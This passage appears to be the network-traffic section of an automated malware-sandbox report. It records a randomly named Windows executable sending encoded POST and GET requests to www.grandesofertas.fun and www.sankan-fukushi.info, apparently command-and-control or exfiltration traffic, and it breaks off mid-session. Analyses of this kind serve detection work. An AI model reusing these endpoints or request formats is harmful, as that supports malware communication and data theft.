                                                            Data Raw: 77 56 62 30 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 51 34 64 6c 42 61 66 6e 62 43 43 38 46 59 56 39 4e 4f 58 38 7a 4f 42 53 79 57 6e 54 44 55 43 54 6b 6e 61 4d 48 6d 4e 32 5a 38 75 69 72 76 57 4c 53 32 4c 71 42 38 6c 56 31 51 36 50 4c 52 43 68 6d 30 6f 56 46 50 6b 79 74 6c 6c 61 31 47 71 63 75 57 71 53 34 78 67 4b 6a 57 75 36 4d 66 39 58 6c 42 49 30 52 4b 51 67 70 58 4b 57 6b 4a 31 4c 76 57 2f 4d 35 37 66 4d 45 7a 70 33 6c 69 6e 46 5a 59 71 65 66 30 39 49 38 42 61 41 44 2b 6b 71 39 41 41 52 4b 48 51 4f 46 55 65 31 75 4c 49 4b 56 30 47 43 6e 50 6e 62 4c 58 68 77 6a 69 31 31 72 38 43 34 52 49 38 78 4c 34 72 6b 2b 78 47 61 42 57 75 67 53 51 3d 3d
                                                            Data Ascii: wVb0=hBRTXVZZoqfFQ4dlBafnbCC8FYV9NOX8zOBSyWnTDUCTknaMHmN2Z8uirvWLS2LqB8lV1Q6PLRChm0oVFPkytlla1GqcuWqS4xgKjWu6Mf9XlBI0RKQgpXKWkJ1LvW/M57fMEzp3linFZYqef09I8BaAD+kq9AARKHQOFUe1uLIKV0GCnPnbLXhwji11r8C4RI8xL4rk+xGaBWugSQ==
                                                            Dec 5, 2024 19:39:50.538296938 CET456INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.74980013.248.221.243806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:39:52.059921980 CET852OUTPOST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 52 59 74 6c 48 39 44 6e 4b 53 43 37 4a 34 56 39 44 75 58 34 7a 4f 4e 53 79 56 72 35 43 67 75 54 6b 46 43 4d 64 69 5a 32 65 38 75 69 34 76 57 4f 63 57 4c 31 42 38 68 64 31 52 47 50 4c 56 71 68 6d 30 59 56 47 2b 6b 78 73 31 6c 59 35 6d 71 53 71 57 71 53 34 78 67 4b 6a 57 37 66 4d 66 31 58 6b 78 34 30 52 76 38 2f 33 48 4b 56 7a 35 31 4c 72 57 2f 49 35 37 66 79 45 33 4a 52 6c 6e 6a 46 5a 59 61 65 65 6d 46 4c 79 42 62 4a 63 4f 6c 74 34 68 30 55 46 6b 73 69 41 54 36 76 6e 73 4a 70 51 43 48 67 39 74 72 33 56 47 5a 4c 6e 67 52 44 38 61 66 4e 54 4a 34 70 47 61 66 46 68 47 6a 77 4d 45 50 6b 45 6d 38 69 68 69 46 50 45 74 45 55 67 68 4d 4b 37 45 47 36 75 32 6f 3d
                                                            Data Ascii: wVb0=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5CguTkFCMdiZ2e8ui4vWOcWL1B8hd1RGPLVqhm0YVG+kxs1lY5mqSqWqS4xgKjW7fMf1Xkx40Rv8/3HKVz51LrW/I57fyE3JRlnjFZYaeemFLyBbJcOlt4h0UFksiAT6vnsJpQCHg9tr3VGZLngRD8afNTJ4pGafFhGjwMEPkEm8ihiFPEtEUghMK7EG6u2o=
                                                            Dec 5, 2024 19:39:53.202189922 CET456INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.74980613.248.221.243806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:39:54.716480017 CET1865OUTPOST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 68 42 52 54 58 56 5a 5a 6f 71 66 46 52 59 74 6c 48 39 44 6e 4b 53 43 37 4a 34 56 39 44 75 58 34 7a 4f 4e 53 79 56 72 35 43 68 36 54 6c 77 65 4d 48 46 31 32 66 38 75 69 6a 50 57 50 63 57 4c 34 42 34 4e 5a 31 52 4b 31 4c 54 75 68 67 6e 67 56 44 4d 63 78 6d 31 6c 59 78 47 71 54 75 57 71 48 34 78 77 47 6a 57 72 66 4d 66 31 58 6b 33 55 30 59 61 51 2f 31 48 4b 57 6b 4a 30 45 76 57 2f 67 35 2f 4c 39 45 33 4d 71 6c 55 62 46 5a 38 2b 65 64 56 39 4c 74 78 62 48 66 4f 6c 50 34 68 70 45 46 6b 41 75 41 57 75 4a 6e 72 39 70 52 56 69 6e 35 50 62 4f 4d 57 56 4e 67 51 34 67 33 38 50 50 53 49 56 55 4a 4b 2f 71 39 6c 58 55 50 7a 54 71 4e 43 38 76 68 68 78 65 4a 39 67 57 6a 55 59 47 6d 48 61 59 33 43 63 77 2f 30 73 58 77 79 53 30 62 7a 67 66 30 76 70 54 6c 43 32 57 2b 65 68 6f 6c 58 55 49 77 68 2b 37 34 69 42 75 35 36 51 59 4b 69 58 76 74 77 72 55 6c 4a 62 7a 6e 72 6e 6f 34 58 7a 38 73 37 36 32 67 79 53 32 37 4a 45 48 4c 5a 58 66 43 5a 57 77 4b 47 73 6f 33 5a 4e 66 68 69 73 65 7a 32 65 4b 31 51 30 56 71 [TRUNCATED]
                                                            Data Ascii: wVb0=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5Ch6TlweMHF12f8uijPWPcWL4B4NZ1RK1LTuhgngVDMcxm1lYxGqTuWqH4xwGjWrfMf1Xk3U0YaQ/1HKWkJ0EvW/g5/L9E3MqlUbFZ8+edV9LtxbHfOlP4hpEFkAuAWuJnr9pRVin5PbOMWVNgQ4g38PPSIVUJK/q9lXUPzTqNC8vhhxeJ9gWjUYGmHaY3Ccw/0sXwyS0bzgf0vpTlC2W+eholXUIwh+74iBu56QYKiXvtwrUlJbznrno4Xz8s762gyS27JEHLZXfCZWwKGso3ZNfhisez2eK1Q0Vq2yvZG4kF1SLKXpmpNqr6wvqUthfA4ewm6BoNk7fWBGQE8nBYkhHj9SVW0k1mQvHFXryT2r/m1HCLM8Nk6giu2ZeNekeTmFmTHaixvM2dTzfL+OKFtcVwMbIjsEG0Na26IhA1FYkRUaTVSANFylWxy2k55aykiRYoTk30mYWJHLH8NwmY96f41pqWqw6X5phSfNjJbJWin3OeNCjwdmDBwNQz4TFwML/wigd6VrcRLNhkdWtrMwsPGw3VybldBv/Fq/knysvD13JeW+DOIomnuJ7tTa82XbYxovSmXdqVtWq4gKe67tgn4o0z33j/CzkZI2Nuh+Wl/N4SDsorWG0TFefdUE8xi2iKs1hz+7uszT6tjKBGsd93owXjHi/gn+XS0/vNG7Np5Pve9jPlhZwYQfboyDXgR/fFDM66nzXeVXclpBh10ZrfkNeIw3RDVzFtv2Vi/WT+aIxepI/UkKRHfINu4KkxChSIkCgW5USgU5piyfFcDTb/5LtUJAG/Cv4ugld/ke/uiOV+3yqKLNj3GSY1nS/LAh1MCRUO3e4gy6/kDZkT/ZIeb0nvKSDmlivKFPDZvsrzkpIOEqG3B/zobTbiQJt+uisSC1huBcCMp7ykih5rC8p+LUeRU5vVCe8cJtoYeOt9EHFIIgsTIG3HSQJrbOgmJZxdbT [TRUNCATED]
                                                            Dec 5, 2024 19:39:55.860114098 CET456INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.74981413.248.221.243806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:39:57.366792917 CET555OUTGET /5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:39:58.566637039 CET614INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Thu, 05 Dec 2024 18:39:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: close
                                                            Location: https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749834163.44.185.183806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:05.331855059 CET835OUTPOST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 77 50 67 70 42 65 7a 5a 47 62 68 43 77 59 4d 64 68 2b 58 77 4a 6b 4d 5a 67 39 6e 34 49 66 79 6f 35 39 37 43 4b 36 45 64 38 67 4e 6f 52 41 37 70 68 35 36 4f 4c 78 46 48 43 37 74 63 46 36 66 47 41 79 73 37 67 53 73 77 57 4f 76 41 49 41 34 37 6b 78 75 46 70 52 74 64 6a 75 65 30 57 74 61 52 53 6a 73 6f 36 55 65 53 57 4b 46 73 66 48 6a 59 59 6c 32 59 65 6f 6a 78 77 4e 49 54 56 30 37 50 4e 4f 72 63 39 4f 73 5a 79 59 6a 6d 45 4e 4c 72 77 79 63 33 30 38 74 52 4d 4b 62 78 6f 48 37 46 36 5a 46 52 42 64 44 30 48 6b 45 46 52 49 51 4b 48 52 66 51 6b 6b 42 74 70 4a 6f 54 55 51 4f 62 31 4b 56 6f 2f 51 3d 3d
                                                            Data Ascii: wVb0=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc308tRMKbxoH7F6ZFRBdD0HkEFRIQKHRfQkkBtpJoTUQOb1KVo/Q==
                                                            Dec 5, 2024 19:40:06.745906115 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:06 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:06.745925903 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                            Dec 5, 2024 19:40:06.745938063 CET448INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                            Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                            Dec 5, 2024 19:40:06.745982885 CET1236INData Raw: 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color: #fc3 transparent;
                                                            Dec 5, 2024 19:40:06.745995998 CET1236INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e
                                                            Data Ascii: } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right { margin-left: 0;
                                                            Dec 5, 2024 19:40:06.746009111 CET1236INData Raw: 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 30 2e 37 34 38 2e 30 35 32 2e 31 36 36 2e 31 32 37 2e 33 32 33 2e
                                                            Data Ascii: .1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.056-8.94 4.956-6.095 3.3
                                                            Dec 5, 2024 19:40:06.746022940 CET1236INData Raw: 32 34 32 2d 2e 35 6c 2d 31 31 2e 30 34 34 2d 31 30 2e 35 32 37 63 2d 2e 34 30 31 2d 2e 33 39 2d 2e 36 2d 2e 39 34 34 2d 2e 35 33 39 2d 31 2e 35 6c 32 2e 39 39 33 2d 32 33 2e 38 38 35 63 2e 31 31 31 2d 2e 39 2e 38 37 34 2d 31 2e 35 37 37 20 31 2e
                                                            Data Ascii: 242-.5l-11.044-10.527c-.401-.39-.6-.944-.539-1.5l2.993-23.885c.111-.9.874-1.577 1.781-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.
                                                            Dec 5, 2024 19:40:06.746318102 CET1236INData Raw: 2e 39 2d 38 2e 32 39 33 2d 32 32 2e 34 34 37 2d 31 39 2e 35 36 36 2e 31 36 38 2d 31 2e 36 30 35 2e 31 31 37 2d 33 2e 32 32 35 2d 2e 31 35 2d 34 2e 38 31 36 2d 2e 31 2d 2e 39 31 38 2d 2e 32 32 34 2d 31 2e 39 31 31 2d 2e 32 38 34 2d 33 2e 30 31 2d
                                                            Data Ascii: .9-8.293-22.447-19.566.168-1.605.117-3.225-.15-4.816-.1-.918-.224-1.911-.284-3.01-.06-1.099 0-2.017 0-3.01.156-1.888-.073-3.787-.673-5.584 1.197-7.123 5.212-13.464 11.139-17.593 7.482 7.736 22.117 10.821 34.418 10.535.947 2.363 1.615 4.828 1.9
                                                            Dec 5, 2024 19:40:06.746332884 CET1236INData Raw: 2d 2e 30 32 33 2d 31 2e 33 32 36 2d 2e 34 35 2d 31 2e 36 30 32 2d 31 2e 30 39 35 73 2d 2e 31 35 34 2d 31 2e 33 39 32 2e 33 31 34 2d 31 2e 39 31 35 63 32 2e 31 32 36 2d 31 2e 39 34 36 20 35 2e 31 39 38 2d 32 2e 34 35 39 20 37 2e 38 34 31 2d 31 2e
                                                            Data Ascii: -.023-1.326-.45-1.602-1.095s-.154-1.392.314-1.915c2.126-1.946 5.198-2.459 7.841-1.309.897.402 1.307 1.448.924 2.353-.383.905-1.42 1.337-2.333.972-1.287-.538-2.765-.337-3.861.527-.35.32-.813.488-1.287.467h.004zm32.054.137c-.487-.003-.952-.204-1
                                                            Dec 5, 2024 19:40:06.746455908 CET1236INData Raw: 2e 32 38 34 2d 2e 36 34 37 63 2d 2e 39 39 37 2d 2e 30 33 38 2d 31 2e 37 37 36 2d 2e 38 37 37 2d 31 2e 37 33 38 2d 31 2e 38 37 34 2e 30 33 38 2d 2e 39 39 37 2e 38 37 37 2d 31 2e 37 37 36 20 31 2e 38 37 34 2d 31 2e 37 33 38 6c 31 35 2e 38 39 32 2e
                                                            Data Ascii: .284-.647c-.997-.038-1.776-.877-1.738-1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.352.651-.172 1.345.034 1.796.534.452.5.586 1.211.348 1.841l-2.825 9.693c-.232.793-.974 1.327-1.8 1.294z"/><path fill="
                                                            Dec 5, 2024 19:40:06.866046906 CET1236INData Raw: 39 32 63 2d 2e 34 30 35 2d 2e 30 30 31 2d 2e 38 30 31 2e 31 32 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 32 31 36 2e 38 39 32 20 31 2e 30 31 35 20 31 2e 35 32 20
                                                            Data Ascii: 92c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.216.892 1.015 1.52 1.933 1.52.918 0 1.717-.628 1.933-1.52.201-.812-.117-1.663-.8-2.145-.332-.231-.727-.354-1.132-.353l-.001-.003zm0-9.427c-.742.001-1.422.415-1.763 1.074-.433.825-.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749840163.44.185.183806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:40:07.997749090 CET855OUTPOST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
